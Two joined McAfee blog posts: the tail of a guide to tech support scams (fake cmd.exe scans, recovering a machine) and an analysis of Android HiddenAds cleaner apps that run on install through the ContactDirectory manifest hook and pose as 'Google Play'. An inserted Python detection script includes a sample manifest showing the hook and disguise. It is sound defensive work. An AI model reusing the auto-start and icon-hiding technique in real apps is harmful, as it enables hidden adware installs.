It is vital to not provide remote access to your computer to unknown and unverified individuals, as there could be a big risk to your personal data. Some examples of remote access tools that have legitimate uses but are often used to perpetrate fraud are:
If the scammers are given access to the victim’s machine, they will often make use of the Windows command prompt, cmd.exe, to perform some visual activity on the screen. This is done to trick the individual into believing that malicious activity is occurring on their computer or network. Most people are unfamiliar with cmd.exe and the commands being run, and thus will be none the wiser to the scammer’s actions.
Here are some examples we have seen scammers use:
Changing the title of cmd.exe to ‘network scanner’ or ‘file scanner’ to make the victim believe they are running a security tool on their machine.
Scammers will make use of standard commands within cmd.exe to make their victims believe they are performing lots of activity. One of these commands is ‘dir’, which lists all the files in a specific directory. For example, if you have a folder called ‘school work’ containing two Word documents, a ‘dir’ listing of that folder will look like this:
What the scammers do is combine ‘dir’ with the title command to make you believe they are scanning your machine. Here is an example of running ‘dir’ over all the files on a machine with the cmd.exe title set to ‘File Scanner’:
A similar command to ‘dir’, called ‘tree’, may also be used. The ‘tree’ command displays directory paths and generates lots of output on the screen:
Some scammers will also add their phone number to the taskbar of the victim’s machine. They do this by creating a new folder with the phone number as the name and adding it as a toolbar. This is shown in the image below.
Scammers may install other software on the victim’s machine or make them believe that they have installed additional software which they will then be charged for.
For example, some scammers may add programs to the desktop of victims which have no purpose, but the scammers insist they are legitimate security tools such as firewalls or network scanners.
Some example filenames are:
The scammers will usually perform some activity on your machine before asking for payment. This is done to build confidence in their work and make you believe they have done some activity and therefore deserve some sort of payment. Do not be fooled by scammers who have not performed any useful activity. As detailed in the previous sections, be careful not to fall victim to fake social media accounts or websites.
This section contains a few signs to look out for which may indicate that you are interacting with a scammer.
Some scammers will become rude and very short with you if you start questioning what they are doing. They may say that you are not technical and do not understand what is occurring. This would not be the behavior of a legitimate technical support operative.
Scammers will encourage you to leave the machine and remote connection on even if you need to go out and leave it unattended. Do not under any circumstances do this as they would then be free to do any activity they wish on your machine and network.
Some files added to your machine by the scammer may be detected by the AV security software. They may act like this is an error and the file is innocent. If you have initiated a remote connection and the controller creates a file on your machine which is detected by the security software, we recommend ceasing the interaction as detailed below.
The following steps should be performed if you believe you are being scammed as part of a tech support scam.
If the machine is connected via a network cable, the easiest way is to unplug it. If the machine is connected via Wi-Fi, there may be a physical switch that can be used to disconnect it. If there is no physical switch, turn off Wi-Fi through the settings, or power the computer down by pressing the power button.
Hang up the phone (or end the chat) and do not answer any more calls from that number. The scammer will try to make you believe that the call is legitimate and ask you to reconnect the remote-control software.
If the scammer was controlling your machine, the remote-control software will need to be removed. If the computer was powered down, it can be powered back up, but if a popup is shown asking for permission to allow remote access, do not grant it.
The remote software can usually be removed by using the control panel and add/remove programs. To do this, press the Windows key and then perform a search for ‘remove’ and click on ‘Add or remove programs’.
Sort the programs by install date as shown below and then remove the remote software by clicking on the ‘Uninstall’ button. Keep in mind that the software installed on your computer may appear by a different name, but if you look at what was installed on the same day as the scammer initiated the remote control session, you should be able to identify it.
Some scammers may add exclusions for the files they create on your computer so that they are not detected by the security software. We recommend checking the exclusions and removing any that you did not add yourself.
A guide for McAfee customers is available here
After removing any software which was installed, we recommend updating your security software and performing a full scan. This will identify any malicious files created by the scammer such as password stealers and keyloggers.
After performing a full scan, we recommend changing all of your passwords as the scammer may have gathered your credentials while they had access to your computer. It is recommended to do this after performing a full scan as the scammers may have placed a password stealer on the computer and any new passwords you enter may also be stolen.
This blog post contains a number of examples that scammers may use to trick consumers into believing that they may have issues with their devices. If you are experiencing issues with your computer and want to speak to official McAfee support, please reach out via the official channel which is https://service.mcafee.com/.
The McAfee support pages can also be accessed directly via the McAfee Total Protection screen as shown below:
McAfee customers utilizing web protection (including McAfee Web Advisor) are protected from known malicious sites.
The post Technical Support Scams – What to look out for appeared first on McAfee Blog.
Authored by Dexter Shin
McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of the apps disguise themselves as cleaner apps that delete junk files or help optimize the battery for device management. However, this malware hides itself and continuously shows advertisements to victims. In addition, it runs malicious services automatically upon installation, without the app ever being opened.
These apps were available on Google Play despite their malicious behavior, so a victim searching for an app to optimize their device could find and install any of the following.
Users may generally think that installing an app without opening it is safe. This malware shows why that assumption does not hold: as soon as it is installed on a device, it runs without any interaction and starts a malicious service.
In addition, the apps try to hide themselves so that users do not notice and delete them. They change their icon to the familiar Google Play icon and their name to ‘Google Play’ or ‘Setting’.
Automatically executed services constantly display advertisements to victims in a variety of ways.
These services also prompt users to open an app whenever they install, uninstall, or update apps on their devices.
To promote these apps to new users, the malware authors created advertising pages on Facebook. Because the link points to Google Play and is distributed through legitimate social media, users download it without suspicion.
This malware uses the Contacts Provider. The Contacts Provider is the source of the data you see in the device’s contacts application; you can also access its data from your own application and transfer data between the device and online services. For this, Google provides the ContactsContract class, which is the contract between the Contacts Provider and applications. Within ContactsContract there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its own unique authority, so developers can use it to implement a custom directory. The Contacts Provider recognizes that an app provides a custom directory by checking for special metadata in the manifest file.
The important point is that the Contacts Provider automatically interrogates newly installed or replaced packages. Thus, installing a package that contains this special metadata always causes the Contacts Provider to be invoked automatically.
Simply by declaring this metadata, the first activity defined in the application tag of the manifest is executed as soon as the app is installed. The first activity of this malware creates a persistent malicious service for displaying advertisements.
In addition, the service process is recreated immediately even if it is force-killed.
Next, to hide themselves, the apps change their icons and names using the <activity-alias> tag.
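A triage heuristic for the mechanism described above, added here as an example and not McAfee’s own tooling: it parses a decoded AndroidManifest.xml (for instance apktool output) and reports the ContactDirectory meta-data hook, the first declared activity, and any activity-alias relabelled as a system app. The sample manifest and its package name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
CONTACT_DIRECTORY_META = "android.content.ContactDirectory"  # documented Android meta-data name
IMPERSONATED_LABELS = {"google play", "setting", "settings"}  # names the post reports being used


def _attr(elem, name):
    """Read an android:-namespaced attribute from a manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def triage_manifest(manifest_xml):
    """Return the install-time auto-start and icon-hiding indicators found in a decoded manifest."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = {"directory_providers": [], "first_activity": None, "suspicious_aliases": []}
    if app is None:
        return findings
    # A provider declaring ContactDirectory=true is queried by the Contacts Provider on install.
    for provider in app.findall("provider"):
        for meta in provider.findall("meta-data"):
            if (_attr(meta, "name") == CONTACT_DIRECTORY_META
                    and str(_attr(meta, "value")).lower() == "true"):
                findings["directory_providers"].append(_attr(provider, "authorities"))
    # The post reports that the first <activity> under <application> is what gets run.
    first = app.find("activity")
    if first is not None:
        findings["first_activity"] = _attr(first, "name")
    # activity-alias entries relabelled as system apps hide the real launcher entry.
    for alias in app.findall("activity-alias"):
        label = (_attr(alias, "label") or "").strip().lower()
        if label in IMPERSONATED_LABELS:
            findings["suspicious_aliases"].append(
                (_attr(alias, "name"), _attr(alias, "targetActivity"), _attr(alias, "label")))
    return findings


def is_suspicious(findings):
    """Flag when both the auto-start hook and an impersonating alias are present."""
    return bool(findings["directory_providers"]) and bool(findings["suspicious_aliases"])


# Constructed sample manifest (hypothetical package name) showing both indicators together.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.cleaner">
  <application android:label="Example Cleaner">
    <activity android:name=".LaunchActivity"/>
    <activity-alias android:name=".PlayAlias" android:targetActivity=".LaunchActivity"
        android:label="Google Play" android:icon="@drawable/play"/>
    <provider android:name=".DirProvider" android:authorities="com.example.cleaner.dir"
        android:exported="true">
      <meta-data android:name="android.content.ContactDirectory" android:value="true"/>
    </provider>
  </application>
</manifest>"""
```

Run `triage_manifest` over each app’s decoded manifest and review any result where `is_suspicious` is true; a legitimate directory provider without an impersonating alias is not flagged.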
Install counts confirm that users have already installed these apps between 100K and 1M+ times each. Since the malware runs as soon as it is installed, the install count reflects the number of victims. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:
This malware auto-starts, so users are infected as soon as they download it from Google Play. Its authors are also constantly developing variants, which are published under different developer accounts. It is therefore not easy for users to notice this type of malware.
We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com
App Name                | Package Name            | Downloads
Junk Cleaner            | cn.junk.clean.plp       | 1M+
EasyCleaner             | com.easy.clean.ipz      | 100K+
Power Doctor            | com.power.doctor.mnb    | 500K+
Super Clean             | com.super.clean.zaz     | 500K+
Full Clean -Clean Cache | org.stemp.fll.clean     | 1M+
Fingertip Cleaner       | com.fingertip.clean.cvb | 500K+
Quick Cleaner           | org.qck.cle.oyo         | 1M+
Keep Clean              | org.clean.sys.lunch     | 1M+
Windy Clean             | in.phone.clean.www      | 500K+
Carpet Clean            | og.crp.cln.zda          | 100K+
Cool Clean              | syn.clean.cool.zbc      | 500K+
Strong Clean            | in.memory.sys.clean     | 500K+
Meteor Clean            | org.ssl.wind.clean      | 100K+
SHA256:
Domains:
The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.